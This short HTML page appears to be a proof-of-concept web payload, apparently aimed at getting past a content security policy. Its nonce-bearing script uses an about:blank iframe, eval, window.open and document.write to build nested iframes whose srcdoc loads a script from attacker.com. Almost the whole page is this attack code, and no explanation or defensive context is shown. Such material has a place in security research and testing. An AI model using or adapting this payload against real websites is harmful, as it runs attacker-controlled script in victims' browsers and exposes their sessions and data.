<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGCZEoyGGGGG" src="about:blank"></iframe>
<script nonce='123'>
window.onload = function() {
    GGGGGCZEoyGGGGG.onload=_=>GGGGGCZEoyGGGGG.contentWindow.eval("w=window.open('about:blank'); w.document.write('<iframe id=GGGCZEoyGGG src=about:blank><\/iframe><script>GGGCZEoyGGG.addEventListener(\x22load\x22,()=>{GGGCZEoyGGG.srcdoc=\x22<script src=https://attacker.com/static/static.js><\\/script>\x22;},{once:true});<\/script>');");GGGGGCZEoyGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>